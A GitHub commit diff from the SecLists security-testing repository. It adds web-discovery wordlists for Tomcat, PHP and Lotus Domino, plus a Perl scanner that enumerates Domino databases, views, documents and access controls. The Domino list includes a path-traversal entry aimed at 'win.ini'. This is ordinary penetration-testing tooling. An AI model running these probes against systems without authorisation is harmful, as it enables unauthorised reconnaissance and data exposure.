mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-05-07 11:16:28 +00:00
Merge pull request #183 from g0tmi1k/structure
Structure Clean Up (v3) & Issue fixes (v2)!
This commit is contained in:
commit
40cf4dd5b7
1
.gitignore
vendored
1
.gitignore
vendored
@ -1 +1,2 @@
|
||||
.DS_Store
|
||||
.*.icloud
|
@ -20,7 +20,12 @@
|
||||
/manager
|
||||
/manager/deploy?path=foo
|
||||
/manager/html/
|
||||
/manager/html
|
||||
/manager/text
|
||||
/manager/jmxproxy
|
||||
/manager/status
|
||||
/servlet/default/
|
||||
/servlet/default
|
||||
/servlet/mstrWebAdmin
|
||||
/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
|
||||
/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
|
||||
@ -45,4 +50,4 @@
|
||||
/WEB-INF/classes/
|
||||
/shared/
|
||||
/shared/lib/
|
||||
/RELEASE-NOTES.txt
|
||||
/RELEASE-NOTES.txt
|
||||
|
@ -14,6 +14,8 @@ search.php
|
||||
user.php
|
||||
menu.php
|
||||
admin.php
|
||||
adminlogin.php
|
||||
addadminuser.php
|
||||
main.php
|
||||
header.php
|
||||
form.php
|
||||
|
@ -0,0 +1,3 @@
|
||||
?OpenDocument
|
||||
?EditDocument
|
||||
?CreateDocument
|
3
Discovery/Web-Content/Domino-Hunter/Commands_NSF.txt
Normal file
3
Discovery/Web-Content/Domino-Hunter/Commands_NSF.txt
Normal file
@ -0,0 +1,3 @@
|
||||
?OpenServer
|
||||
/$DefaultNav?OpenNavigator
|
||||
?ReadEntries
|
5
Discovery/Web-Content/Domino-Hunter/Commands_Views.txt
Normal file
5
Discovery/Web-Content/Domino-Hunter/Commands_Views.txt
Normal file
@ -0,0 +1,5 @@
|
||||
?OpenView
|
||||
?ReadViewEntries
|
||||
?ReadDesign
|
||||
/$first?OpenDocument
|
||||
/$defaultform?OpenForm
|
116
Discovery/Web-Content/Domino-Hunter/Domino_Files.txt
Normal file
116
Discovery/Web-Content/Domino-Hunter/Domino_Files.txt
Normal file
@ -0,0 +1,116 @@
|
||||
homepage.nsf
|
||||
admin4.nsf
|
||||
agentrunner.nsf
|
||||
busytime.nsf
|
||||
catalog.nsf
|
||||
certsrv.nsf
|
||||
dspug.nsf
|
||||
events4.nsf
|
||||
log.nsf
|
||||
mail.box
|
||||
mtatbls.nsf
|
||||
names.nsf
|
||||
reports.nsf
|
||||
statmail.nsf
|
||||
webadmin.nsf
|
||||
?Open
|
||||
?OpenServer
|
||||
admin5.nsf
|
||||
admin.nsf
|
||||
alog.nsf
|
||||
bookmarks.nsf
|
||||
certa.nsf
|
||||
certlog.nsf
|
||||
chatlog.nsf
|
||||
collect4.nsf
|
||||
dba4.nsf
|
||||
dclf.nsf
|
||||
decsadm.nsf
|
||||
deslog.nsf
|
||||
domadmin.nsf
|
||||
domadmin.nsf
|
||||
domcfg.nsf
|
||||
domguide.nsf
|
||||
events5.nsf
|
||||
events.nsf
|
||||
event.nsf
|
||||
log4a.nsf
|
||||
mab.nsf
|
||||
nntppost.nsf
|
||||
ntsync45.nsf
|
||||
perweb.nsf
|
||||
quickplacequickplacemain.nsf
|
||||
schema50.nsf
|
||||
setupweb.nsf
|
||||
setup.nsf
|
||||
smbcfg.nsf
|
||||
srvnam.htm
|
||||
statrep.nsf
|
||||
stauths.nsf
|
||||
stautht.nsf
|
||||
stconfig.nsf
|
||||
stconf.nsf
|
||||
stdnaset.nsf
|
||||
stdomino.nsf
|
||||
stlog.nsf
|
||||
stsrc.nsf
|
||||
vpuserinfo.nsf
|
||||
web.nsf
|
||||
852566C90012664F
|
||||
a_domlog.nsf
|
||||
bookmark.nsf
|
||||
clbusy.nsf
|
||||
cldbdir.nsf
|
||||
clusta4.nsf
|
||||
da.nsf
|
||||
DEASAppDesign.nsf
|
||||
DEASLog01.nsf
|
||||
DEASLog02.nsf
|
||||
DEASLog03.nsf
|
||||
DEASLog04.nsf
|
||||
DEASLog05.nsf
|
||||
DEASLog.nsf
|
||||
decslog.nsf
|
||||
DEESAdmin.nsf
|
||||
dirassist.nsf
|
||||
doladmin.nsf
|
||||
domlog.nsf
|
||||
iNotes/Forms5.nsf/$DefaultNav
|
||||
jotter.nsf
|
||||
leiadm.nsf
|
||||
leilog.nsf
|
||||
leivlt.nsf
|
||||
l_domlog.nsf
|
||||
mail10.box
|
||||
mail1.box
|
||||
mail2.box
|
||||
mail3.box
|
||||
mail4.box
|
||||
mail5.box
|
||||
mail6.box
|
||||
mail7.box
|
||||
mail8.box
|
||||
mail9.box
|
||||
msdwda.nsf
|
||||
mtstore.nsf
|
||||
nntp/nd000001.nsf
|
||||
nntp/nd000002.nsf
|
||||
nntp/nd000003.nsf
|
||||
qpadmin.nsf
|
||||
quickplace/quickplace/main.nsf
|
||||
sample/siregw46.nsf
|
||||
smconf.nsf
|
||||
smency.nsf
|
||||
smhelp.nsf
|
||||
smmsg.nsf
|
||||
smquar.nsf
|
||||
smsolar.nsf
|
||||
smtime.nsf
|
||||
smtpibwq.nsf
|
||||
smtpobwq.nsf
|
||||
smtp.box
|
||||
smtp.nsf
|
||||
smvlog.nsf
|
||||
streg.nsf
|
||||
userreg.nsf
|
||||
.nsf/../winnt/win.ini
|
340
Discovery/Web-Content/Domino-Hunter/LICENCE.txt
Normal file
340
Discovery/Web-Content/Domino-Hunter/LICENCE.txt
Normal file
@ -0,0 +1,340 @@
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 2, June 1991
|
||||
|
||||
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
|
||||
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The licenses for most software are designed to take away your
|
||||
freedom to share and change it. By contrast, the GNU General Public
|
||||
License is intended to guarantee your freedom to share and change free
|
||||
software--to make sure the software is free for all its users. This
|
||||
General Public License applies to most of the Free Software
|
||||
Foundation's software and to any other program whose authors commit to
|
||||
using it. (Some other Free Software Foundation software is covered by
|
||||
the GNU Library General Public License instead.) You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
this service if you wish), that you receive source code or can get it
|
||||
if you want it, that you can change the software or use pieces of it
|
||||
in new free programs; and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to make restrictions that forbid
|
||||
anyone to deny you these rights or to ask you to surrender the rights.
|
||||
These restrictions translate to certain responsibilities for you if you
|
||||
distribute copies of the software, or if you modify it.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must give the recipients all the rights that
|
||||
you have. You must make sure that they, too, receive or can get the
|
||||
source code. And you must show them these terms so they know their
|
||||
rights.
|
||||
|
||||
We protect your rights with two steps: (1) copyright the software, and
|
||||
(2) offer you this license which gives you legal permission to copy,
|
||||
distribute and/or modify the software.
|
||||
|
||||
Also, for each author's protection and ours, we want to make certain
|
||||
that everyone understands that there is no warranty for this free
|
||||
software. If the software is modified by someone else and passed on, we
|
||||
want its recipients to know that what they have is not the original, so
|
||||
that any problems introduced by others will not reflect on the original
|
||||
authors' reputations.
|
||||
|
||||
Finally, any free program is threatened constantly by software
|
||||
patents. We wish to avoid the danger that redistributors of a free
|
||||
program will individually obtain patent licenses, in effect making the
|
||||
program proprietary. To prevent this, we have made it clear that any
|
||||
patent must be licensed for everyone's free use or not licensed at all.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
GNU GENERAL PUBLIC LICENSE
|
||||
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
|
||||
|
||||
0. This License applies to any program or other work which contains
|
||||
a notice placed by the copyright holder saying it may be distributed
|
||||
under the terms of this General Public License. The "Program", below,
|
||||
refers to any such program or work, and a "work based on the Program"
|
||||
means either the Program or any derivative work under copyright law:
|
||||
that is to say, a work containing the Program or a portion of it,
|
||||
either verbatim or with modifications and/or translated into another
|
||||
language. (Hereinafter, translation is included without limitation in
|
||||
the term "modification".) Each licensee is addressed as "you".
|
||||
|
||||
Activities other than copying, distribution and modification are not
|
||||
covered by this License; they are outside its scope. The act of
|
||||
running the Program is not restricted, and the output from the Program
|
||||
is covered only if its contents constitute a work based on the
|
||||
Program (independent of having been made by running the Program).
|
||||
Whether that is true depends on what the Program does.
|
||||
|
||||
1. You may copy and distribute verbatim copies of the Program's
|
||||
source code as you receive it, in any medium, provided that you
|
||||
conspicuously and appropriately publish on each copy an appropriate
|
||||
copyright notice and disclaimer of warranty; keep intact all the
|
||||
notices that refer to this License and to the absence of any warranty;
|
||||
and give any other recipients of the Program a copy of this License
|
||||
along with the Program.
|
||||
|
||||
You may charge a fee for the physical act of transferring a copy, and
|
||||
you may at your option offer warranty protection in exchange for a fee.
|
||||
|
||||
2. You may modify your copy or copies of the Program or any portion
|
||||
of it, thus forming a work based on the Program, and copy and
|
||||
distribute such modifications or work under the terms of Section 1
|
||||
above, provided that you also meet all of these conditions:
|
||||
|
||||
a) You must cause the modified files to carry prominent notices
|
||||
stating that you changed the files and the date of any change.
|
||||
|
||||
b) You must cause any work that you distribute or publish, that in
|
||||
whole or in part contains or is derived from the Program or any
|
||||
part thereof, to be licensed as a whole at no charge to all third
|
||||
parties under the terms of this License.
|
||||
|
||||
c) If the modified program normally reads commands interactively
|
||||
when run, you must cause it, when started running for such
|
||||
interactive use in the most ordinary way, to print or display an
|
||||
announcement including an appropriate copyright notice and a
|
||||
notice that there is no warranty (or else, saying that you provide
|
||||
a warranty) and that users may redistribute the program under
|
||||
these conditions, and telling the user how to view a copy of this
|
||||
License. (Exception: if the Program itself is interactive but
|
||||
does not normally print such an announcement, your work based on
|
||||
the Program is not required to print an announcement.)
|
||||
|
||||
These requirements apply to the modified work as a whole. If
|
||||
identifiable sections of that work are not derived from the Program,
|
||||
and can be reasonably considered independent and separate works in
|
||||
themselves, then this License, and its terms, do not apply to those
|
||||
sections when you distribute them as separate works. But when you
|
||||
distribute the same sections as part of a whole which is a work based
|
||||
on the Program, the distribution of the whole must be on the terms of
|
||||
this License, whose permissions for other licensees extend to the
|
||||
entire whole, and thus to each and every part regardless of who wrote it.
|
||||
|
||||
Thus, it is not the intent of this section to claim rights or contest
|
||||
your rights to work written entirely by you; rather, the intent is to
|
||||
exercise the right to control the distribution of derivative or
|
||||
collective works based on the Program.
|
||||
|
||||
In addition, mere aggregation of another work not based on the Program
|
||||
with the Program (or with a work based on the Program) on a volume of
|
||||
a storage or distribution medium does not bring the other work under
|
||||
the scope of this License.
|
||||
|
||||
3. You may copy and distribute the Program (or a work based on it,
|
||||
under Section 2) in object code or executable form under the terms of
|
||||
Sections 1 and 2 above provided that you also do one of the following:
|
||||
|
||||
a) Accompany it with the complete corresponding machine-readable
|
||||
source code, which must be distributed under the terms of Sections
|
||||
1 and 2 above on a medium customarily used for software interchange; or,
|
||||
|
||||
b) Accompany it with a written offer, valid for at least three
|
||||
years, to give any third party, for a charge no more than your
|
||||
cost of physically performing source distribution, a complete
|
||||
machine-readable copy of the corresponding source code, to be
|
||||
distributed under the terms of Sections 1 and 2 above on a medium
|
||||
customarily used for software interchange; or,
|
||||
|
||||
c) Accompany it with the information you received as to the offer
|
||||
to distribute corresponding source code. (This alternative is
|
||||
allowed only for noncommercial distribution and only if you
|
||||
received the program in object code or executable form with such
|
||||
an offer, in accord with Subsection b above.)
|
||||
|
||||
The source code for a work means the preferred form of the work for
|
||||
making modifications to it. For an executable work, complete source
|
||||
code means all the source code for all modules it contains, plus any
|
||||
associated interface definition files, plus the scripts used to
|
||||
control compilation and installation of the executable. However, as a
|
||||
special exception, the source code distributed need not include
|
||||
anything that is normally distributed (in either source or binary
|
||||
form) with the major components (compiler, kernel, and so on) of the
|
||||
operating system on which the executable runs, unless that component
|
||||
itself accompanies the executable.
|
||||
|
||||
If distribution of executable or object code is made by offering
|
||||
access to copy from a designated place, then offering equivalent
|
||||
access to copy the source code from the same place counts as
|
||||
distribution of the source code, even though third parties are not
|
||||
compelled to copy the source along with the object code.
|
||||
|
||||
4. You may not copy, modify, sublicense, or distribute the Program
|
||||
except as expressly provided under this License. Any attempt
|
||||
otherwise to copy, modify, sublicense or distribute the Program is
|
||||
void, and will automatically terminate your rights under this License.
|
||||
However, parties who have received copies, or rights, from you under
|
||||
this License will not have their licenses terminated so long as such
|
||||
parties remain in full compliance.
|
||||
|
||||
5. You are not required to accept this License, since you have not
|
||||
signed it. However, nothing else grants you permission to modify or
|
||||
distribute the Program or its derivative works. These actions are
|
||||
prohibited by law if you do not accept this License. Therefore, by
|
||||
modifying or distributing the Program (or any work based on the
|
||||
Program), you indicate your acceptance of this License to do so, and
|
||||
all its terms and conditions for copying, distributing or modifying
|
||||
the Program or works based on it.
|
||||
|
||||
6. Each time you redistribute the Program (or any work based on the
|
||||
Program), the recipient automatically receives a license from the
|
||||
original licensor to copy, distribute or modify the Program subject to
|
||||
these terms and conditions. You may not impose any further
|
||||
restrictions on the recipients' exercise of the rights granted herein.
|
||||
You are not responsible for enforcing compliance by third parties to
|
||||
this License.
|
||||
|
||||
7. If, as a consequence of a court judgment or allegation of patent
|
||||
infringement or for any other reason (not limited to patent issues),
|
||||
conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot
|
||||
distribute so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you
|
||||
may not distribute the Program at all. For example, if a patent
|
||||
license would not permit royalty-free redistribution of the Program by
|
||||
all those who receive copies directly or indirectly through you, then
|
||||
the only way you could satisfy both it and this License would be to
|
||||
refrain entirely from distribution of the Program.
|
||||
|
||||
If any portion of this section is held invalid or unenforceable under
|
||||
any particular circumstance, the balance of the section is intended to
|
||||
apply and the section as a whole is intended to apply in other
|
||||
circumstances.
|
||||
|
||||
It is not the purpose of this section to induce you to infringe any
|
||||
patents or other property right claims or to contest validity of any
|
||||
such claims; this section has the sole purpose of protecting the
|
||||
integrity of the free software distribution system, which is
|
||||
implemented by public license practices. Many people have made
|
||||
generous contributions to the wide range of software distributed
|
||||
through that system in reliance on consistent application of that
|
||||
system; it is up to the author/donor to decide if he or she is willing
|
||||
to distribute software through any other system and a licensee cannot
|
||||
impose that choice.
|
||||
|
||||
This section is intended to make thoroughly clear what is believed to
|
||||
be a consequence of the rest of this License.
|
||||
|
||||
8. If the distribution and/or use of the Program is restricted in
|
||||
certain countries either by patents or by copyrighted interfaces, the
|
||||
original copyright holder who places the Program under this License
|
||||
may add an explicit geographical distribution limitation excluding
|
||||
those countries, so that distribution is permitted only in or among
|
||||
countries not thus excluded. In such case, this License incorporates
|
||||
the limitation as if written in the body of this License.
|
||||
|
||||
9. The Free Software Foundation may publish revised and/or new versions
|
||||
of the General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the Program
|
||||
specifies a version number of this License which applies to it and "any
|
||||
later version", you have the option of following the terms and conditions
|
||||
either of that version or of any later version published by the Free
|
||||
Software Foundation. If the Program does not specify a version number of
|
||||
this License, you may choose any version ever published by the Free Software
|
||||
Foundation.
|
||||
|
||||
10. If you wish to incorporate parts of the Program into other free
|
||||
programs whose distribution conditions are different, write to the author
|
||||
to ask for permission. For software which is copyrighted by the Free
|
||||
Software Foundation, write to the Free Software Foundation; we sometimes
|
||||
make exceptions for this. Our decision will be guided by the two goals
|
||||
of preserving the free status of all derivatives of our free software and
|
||||
of promoting the sharing and reuse of software generally.
|
||||
|
||||
NO WARRANTY
|
||||
|
||||
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
|
||||
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
|
||||
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
|
||||
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
|
||||
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
||||
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
|
||||
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
|
||||
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
|
||||
REPAIR OR CORRECTION.
|
||||
|
||||
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
|
||||
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
|
||||
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
|
||||
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
|
||||
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
|
||||
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
|
||||
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGES.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
convey the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software; you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation; either version 2 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program; if not, write to the Free Software
|
||||
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
|
||||
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program is interactive, make it output a short notice like this
|
||||
when it starts in an interactive mode:
|
||||
|
||||
Gnomovision version 69, Copyright (C) year name of author
|
||||
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, the commands you use may
|
||||
be called something other than `show w' and `show c'; they could even be
|
||||
mouse-clicks or menu items--whatever suits your program.
|
||||
|
||||
You should also get your employer (if you work as a programmer) or your
|
||||
school, if any, to sign a "copyright disclaimer" for the program, if
|
||||
necessary. Here is a sample; alter the names:
|
||||
|
||||
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
|
||||
`Gnomovision' (which makes passes at compilers) written by James Hacker.
|
||||
|
||||
<signature of Ty Coon>, 1 April 1989
|
||||
Ty Coon, President of Vice
|
||||
|
||||
This General Public License does not permit incorporating your program into
|
||||
proprietary programs. If your program is a subroutine library, you may
|
||||
consider it more useful to permit linking proprietary applications with the
|
||||
library. If this is what you want to do, use the GNU Library General
|
||||
Public License instead of this License.
|
297
Discovery/Web-Content/Domino-Hunter/dh.pl
Normal file
297
Discovery/Web-Content/Domino-Hunter/dh.pl
Normal file
@ -0,0 +1,297 @@
|
||||
#!/usr/bin/perl
|
||||
# Domino.pl - By Onigumo. 02/06/2003.
|
||||
# Contact: onigumo@free.fr
|
||||
#
|
||||
# This program is released under the GPL, see license file in same directory.
|
||||
#
|
||||
# ENJOY!
|
||||
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request;
|
||||
use HTTP::Response;
|
||||
use HTTP::Cookies;
|
||||
use Getopt::Std;
|
||||
|
||||
|
||||
getopts("h:d:l:u:f:n");
|
||||
#use vars qw( $opt_h $opt_d $opt_l $opt_u $opt_f $opt_s);
|
||||
|
||||
print "\n\nDomino Hunter - By Onugimo (c)2003 (onigumo@free.fr)\n\n\n";
|
||||
|
||||
if (!$opt_h || ($opt_d && $opt_d !~ /.+\.nsf$/) || ($opt_u && $opt_u !~ /.+\:.+/) || ($opt_d && $opt_f)) {
|
||||
print "\n\nUSAGE :\n";
|
||||
print "\t$0 <-h Host/IP> [-l logfile] [-d remote NSF file] [-u Username:Password]\n";
|
||||
print "\t$0 <-h Host/IP> [-l logfile] [-f NSF files list] [-u Username:Password] [-n (no full scan)]\n\n";
|
||||
exit 1;
|
||||
}
|
||||
|
||||
$host = $opt_h;
|
||||
$database = $opt_d;
|
||||
$logfile = $opt_l;
|
||||
|
||||
if ($opt_f) {
|
||||
$files = $opt_f;
|
||||
}else {
|
||||
$files = "Domino_files.txt";
|
||||
}
|
||||
|
||||
$authentication_failure = "error";
|
||||
|
||||
$browser = LWP::UserAgent->new;
|
||||
$browser->agent('Mozilla/4.76 [en] (Win98; U)');
|
||||
$browser->cookie_jar(HTTP::Cookies->new(file => 'cookies.txt', autosave => 1, ignore_discard => 1));
|
||||
$browser->timeout(5);
|
||||
|
||||
if ($opt_u) {
|
||||
$opt_u =~ s/ /%20/g; $opt_u =~ /^(.+)\:(.+)$/;
|
||||
$username = $1; $password = $2;
|
||||
$login_form = "names.nsf/?Login";
|
||||
|
||||
die "Invalid credentials supplied\n\n$!" if (!Login($browser,"http://$host/$login_form",$username,$password));
|
||||
print "--[ Using credentials: $username / $password\n";
|
||||
}
|
||||
|
||||
open (LOGFILE,"> $logfile") if ($logfile);
|
||||
|
||||
$commands_docs = "Commands_Documents.txt";
|
||||
$commands_views = "Commands_Views.txt";
|
||||
$commands_nsf = "Commands_NSF.txt";
|
||||
|
||||
if (!$database) {
|
||||
ScanFiles($browser,$host,$files);
|
||||
}
|
||||
else {
|
||||
ScanSingleFile($browser,$host,$database);
|
||||
}
|
||||
|
||||
my_print("\n--[ Finished.\n\n");
|
||||
|
||||
close (LOGFILE) if ($logfile);
|
||||
|
||||
sub ScanFiles {
|
||||
my($browser,$host,$files) = @_;
|
||||
my $retvalue, $output;
|
||||
|
||||
my_print("\n--[ Scanning NSF list: $files...\n\n");
|
||||
|
||||
open (FILE, "$files") or die "\n\nSorry Cant Open $files \n\n$!";
|
||||
|
||||
foreach $cgi (<FILE>) {
|
||||
chomp $cgi;
|
||||
my_print(" -- Now scanning: [$cgi]\n\n") if (!$opt_n);
|
||||
ScanSingleFile($browser,$host,$cgi);
|
||||
}
|
||||
|
||||
close(FILE);
|
||||
}
|
||||
|
||||
sub ScanSingleFile {
|
||||
my($browser,$host,$database) = @_;
|
||||
my $retvalue,$url,$output,@views;
|
||||
|
||||
($retvalue,$url,$output) = TestDatabase($browser,$host,$database);
|
||||
|
||||
if (!$opt_n && $retvalue) {
|
||||
OpenDatabase($browser,$host,$database);
|
||||
@views = EnumerateViews($browser,$host,$database); die "Error: no valid view found" if (!@views);
|
||||
EnumerateDocs($browser,$host,$database,@views);
|
||||
Summary();
|
||||
} else {
|
||||
if (!$opt_n || ($output !~ /^404/ && $output !~ /^500/)) {
|
||||
my_print("$url -> $output\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
sub TestDatabase {
|
||||
my($browser,$host,$database) = @_;
|
||||
my $retvalue,$output,$content,$raw;
|
||||
|
||||
$url = "http://$host/$database";
|
||||
($output,$content,$raw) = GetUrl($browser,$url);
|
||||
|
||||
$retvalue = ($output =~ /^200/);
|
||||
return ($retvalue,$url,$output);
|
||||
}
|
||||
|
||||
sub OpenDatabase {
|
||||
my($browser,$host,$database) = @_;
|
||||
my @C_MSF, $output, $url, $content, $raw;
|
||||
|
||||
open (F3, "$commands_nsf") or die "\n\nCan't open $commands_nsf \n\n$!";
|
||||
@C_NSF = <F3>; chop(@C_NSF); close(F3);
|
||||
|
||||
my_print("\n--[ Trying default NSF commands on $database...\n\n");
|
||||
|
||||
foreach $nsf (@C_NSF) {
|
||||
$url = "http://$host/$database$nsf";
|
||||
($output,$content, $raw) = GetUrl($browser,$url);
|
||||
Output($url,$output);
|
||||
}
|
||||
}
|
||||
|
||||
sub EnumerateViews {
|
||||
my($browser,$host,$database) = @_;
|
||||
my @C_Views, @Valid_Views, $output, $i, $_url, $url, $content, $raw, $viewid;
|
||||
|
||||
open (F2, "$commands_views") or die "\n\nCan't open $commands_views \n\n$!";
|
||||
@C_Views = <F2>; chop(@C_Views); close(F2);
|
||||
|
||||
my_print("\n--[ Scanning available views...\n\n");
|
||||
|
||||
for ($i = 282; $i < 4095; $i += 4) {
|
||||
$viewid = sprintf "%03x",$i;
|
||||
$url = "http://$host/$database/$viewid";
|
||||
($output,$content,$raw) = GetUrl($browser,$url);
|
||||
Output($url,$output);
|
||||
if ($output =~ /^200/) {
|
||||
push(@Valid_Views,$viewid);
|
||||
foreach $command (@C_Views) {
|
||||
$_url = "$url$command&AutoFramed";
|
||||
($output,$content,$raw) = GetUrl($browser,$_url);
|
||||
Output($_url,$output);
|
||||
if ($content =~ /viewentries/) {
|
||||
ParseViewEntries($content,sprintf("%03x",$i));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return @Valid_Views;
|
||||
}
|
||||
|
||||
sub ParseViewEntries {
|
||||
my ($content, $vid) = @_;
|
||||
my @lines = split(/\n/,$content);
|
||||
|
||||
foreach $line (@lines) {
|
||||
if ($line =~ /<viewentry[^>]*unid="([^"]*)"[^>]*noteid="([^"]*)"[^>]*>/) {
|
||||
$unid{$1} = $vid;
|
||||
$noteid{$2} = $vid;
|
||||
|
||||
my_print("\t+ Document $1 / $2 appears in view $vid\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub EnumerateDocs {
|
||||
my($browser,$host,$database,@views) = @_;
|
||||
my @C_Docs, $output, $i, $url, $content, $raw, $nid, $viewnoteid;
|
||||
|
||||
open (F1, "$commands_docs") or die "\n\nCan't open $commands_docs \n\n$!";
|
||||
@C_Docs = <F1>; chop(@C_Docs); close(F1);
|
||||
|
||||
my_print("\n--[ Enumerating documents through valid views...\n\n");
|
||||
|
||||
foreach $viewid (@views) {
|
||||
my_print(" Current view = $viewid\n\n");
|
||||
|
||||
for ($i = 2294; $i < 4095; $i += 4) {
|
||||
$nid = sprintf "%03x",$i;
|
||||
$viewnoteid = $noteid{$nid};
|
||||
$url = "http://$host/$database/$viewid/$nid?OpenDocument&AutoFramed";
|
||||
($output,$content,$raw) = GetUrl($browser,$url);
|
||||
if ($viewnoteid) {
|
||||
if ($view =~ /$viewnoteid$/) {
|
||||
Output("-- $url",$output);
|
||||
} else {
|
||||
Output("++ $url",$output);
|
||||
}
|
||||
} else {
|
||||
Output(" ? $url",$output);
|
||||
$viewnoteid = $viewid;
|
||||
}
|
||||
|
||||
if ($output =~ /^200/) {
|
||||
$access{$nid}[hex($viewnoteid)] = 1;
|
||||
} else {
|
||||
if ($viewid eq $viewnoteid) {
|
||||
$access{$nid}[hex{$viewnoteid}] = -10;
|
||||
} else {
|
||||
$access{$nid}[hex{$viewnoteid}] = -1;
|
||||
}
|
||||
}
|
||||
|
||||
break if ($output =~ /^500/);
|
||||
}
|
||||
my_print("\n");
|
||||
}
|
||||
}
|
||||
|
||||
sub Summary {
|
||||
my $i,$docid,$restricted, $hexvalue;
|
||||
my_print("\n--[ ACLs summary\n\n");
|
||||
|
||||
foreach $docid (keys %access) {
|
||||
$restricted = 0;
|
||||
my_print(" doc = $docid> ");
|
||||
|
||||
for ($i = 282; $i < 4095; $i += 4) {
|
||||
if ($access{$docid}[$i] == 1) {
|
||||
$hexvalue = sprintf "%03x",$i;
|
||||
my_print("$hexvalue|");
|
||||
}
|
||||
elsif ($access{$docid}[$i] == -1) {
|
||||
print " |";
|
||||
}
|
||||
$restricted = ($access{$docid}[$i] == -10);
|
||||
}
|
||||
my_print("(restricted on home view)") if ($restricted);
|
||||
my_print("\n\n");
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
sub GetUrl {
|
||||
my ($browser,$url) = @_;
|
||||
my $req = new HTTP::Request("GET" => "$url");
|
||||
my $response = $browser->request($req);
|
||||
my $content, $file, $shorturl;
|
||||
|
||||
return "Access denied" if ($response->status_line =~ /^200/ && $response->as_string =~ /$authentication_failure/);
|
||||
|
||||
if ($response->status_line =~ /^200/) {
|
||||
$file = $url; $file =~ s/.*:\/\/[^\/]+\/([^\?]+).*/\/$1/;
|
||||
$shorturl = $file; $shorturl =~ s/^.*\.nsf(\/.*)$/$1/;
|
||||
$content = $response->content;
|
||||
$content =~ s#"$file[^"]*"#""#g;
|
||||
|
||||
if (!$hash{$content}) {
|
||||
$hash{$content} = "$shorturl";
|
||||
} else {
|
||||
return ($response->status_line." (similar to: ".$hash{$content}.")",$content,$response->as_string);
|
||||
}
|
||||
}
|
||||
|
||||
